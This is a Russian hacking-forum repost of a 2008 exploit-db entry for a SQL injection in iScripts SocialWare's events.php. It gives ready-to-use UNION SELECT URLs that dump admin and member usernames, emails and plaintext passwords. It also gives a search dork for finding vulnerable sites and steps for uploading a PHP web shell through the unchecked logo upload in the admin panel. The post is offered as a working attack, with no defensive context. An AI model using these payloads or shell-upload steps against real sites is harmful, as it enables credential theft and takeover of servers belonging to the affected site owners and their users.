Exploit iScripts Socialware - 'id' SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5402
Проверка EDB
  1. Пройдено
Автор
T0PP8UZZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-1859 cve-2008-1790 cve-2008-1772
Дата публикации
2008-04-07
Код: 
--==+================================================================================+==--
--==+		       iScripts SocialWare SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 8 April 2008
SITE: www.iscripts.com
DORK (altavista.com): "Powered by iScripts SocialWare" 


DESCRIPTION: 
pull admin/user info from database.


EXPLOITS:
www.site.com/events.php?action=show&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3c666f6e7420636f6c6f723d22726564223e,Username,char(58),Password,0x3c2f666f6e743e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/FROM/**/admin_users/*
www.site.com/events.php?action=show&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3c666f6e7420636f6c6f723d22726564223e,email,char(58),password,0x3c2f666f6e743e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/FROM/**/members/*


NOTE/TIP:
admin login is at /admin/
all passwords are in plaintext!

on some sites the admin login is stored in "theact_admin_users"

uploading shell:
to upload shell first use the 1st injection to get admin login credentials, then goto the admin login /admin/
login and in the left menu click "Manage Settings" in this page it gives you a option to select a new logo
but the extension isnt checked here, so we can upload php files, so select your php shell and hit "Save".

ok now goto site.com/images/ where site.com is the actual website. and look for your uploaded file/shell


GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



--==+================================================================================+==--
--==+		       iScripts SocialWare SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-07]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit iscripts Socialware 2.2.x - Multiple Vulnerabilities
Ответы
0
Просмотры
285
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit iScripts Socialware 2.2.x - Arbitrary File Upload
Ответы
0
Просмотры
273
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit iScripts AutoHoster - 'id' Local File Inclusion
Ответы
0
Просмотры
419
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit iScripts AutoHoster - 'main_smtp.php' Traversal
Ответы
0
Просмотры
409
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit iScripts AutoHoster - 'tmpid' Local File Inclusion
Ответы
0
Просмотры
419
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit iScripts AutoHoster - 'fname' Local File Inclusion
Ответы
0
Просмотры
427
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection
Ответы
0
Просмотры
417
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit iScripts AutoHoster - 'additionalsettings.php' SQL Injection
Ответы
0
Просмотры
417
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit iScripts AutoHoster - 'invno' SQL Injection
Ответы
0
Просмотры
418
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit iScripts AutoHoster - 'checktransferstatus.php' SQL Injection
Ответы
0
Просмотры
415
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу